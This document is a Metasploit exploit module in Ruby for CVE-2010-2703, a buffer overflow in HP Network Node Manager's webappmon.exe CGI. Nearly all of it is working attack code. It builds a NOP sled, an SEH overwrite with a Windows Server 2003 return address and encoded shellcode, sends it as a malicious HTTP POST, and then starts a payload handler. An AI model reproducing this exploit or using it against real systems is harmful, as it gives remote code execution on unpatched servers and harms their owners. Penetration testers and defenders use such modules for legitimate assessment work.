HP NNM CGI webappmon.exe execvp Buffer Overflow

`##  
# $Id: hp_nnm_webappmon_execvp.rb 12086 2011-03-23 03:38:46Z sinn3r $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::Seh  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "HP NNM CGI webappmon.exe execvp Buffer Overflow",  
'Description' => %q{  
This module exploits a buffer overflow in HP NNM's webappmon.exe.  
The vulnerability occurs when function "execvp_nc" fails to do any bounds-  
checking before strcat is used to append user-supplied input to a buffer.  
},  
'License' => MSF_LICENSE,  
'Version' => "$Revision: 12086 $",  
'Author' =>  
[  
'shahin <shahin[at]abysssec.com>',  
'sinn3r',  
],  
'References' =>  
[  
['CVE', '2010-2703'],  
['OSVDB', '66514'],  
],  
'Payload' =>  
{  
'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0a..0x0f)].pack("C*") + [*(0x10..0x1f)].pack("C*") + "\x7f",  
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,  
'EncoderOptions' => {'BufferRegister'=>'ECX'},  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => "seh",  
'AutoRunScript' => 'migrate -f',  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows Server 2003 Ent', {'Ret'=>0x5A30532D} ],  
],  
'DisclosureDate' => "SEP 6 2010"))  
  
register_options(  
[  
Opt::RPORT(80),  
], self.class)  
end  
  
def exploit  
nops = make_nops(1000)*10  
  
sploit = nops[0, 5455]  
sploit << generate_seh_record(target.ret)  
sploit << "\x61"*13  
sploit << "\x51"  
sploit << "\xc3"  
sploit << nops[0, 57]  
sploit << payload.encoded  
sploit << nops[0, 10000-sploit.length]  
  
post_data = "ins=#{sploit}&sel=#{sploit}&app=#{sploit}&act=#{sploit}&arg=#{sploit}&help=#{sploit}&cache=1600 HTTP/1.1"  
  
connect  
  
print_status("Sending malicious request...")  
send_request_raw({  
'uri' => '/OvCgi/webappmon.exe',  
'data' => post_data,  
'version' => '1.1',  
'method' => 'POST',  
'headers' => {  
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',  
'Accept-Language' => 'en-us,en;q=0.5',  
'Accept-Encoding' => 'gzip,deflate',  
'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',  
'Keep-Alive' => '300',  
'Connection' => 'Keep-Alive',  
'Cache-Control' => 'max-age=0',  
'Content-Length' => post_data.length,  
'Content-Type' => 'application/x-www-form-urlencoded',  
}  
}, 3)  
  
handler  
disconnect  
  
end  
end`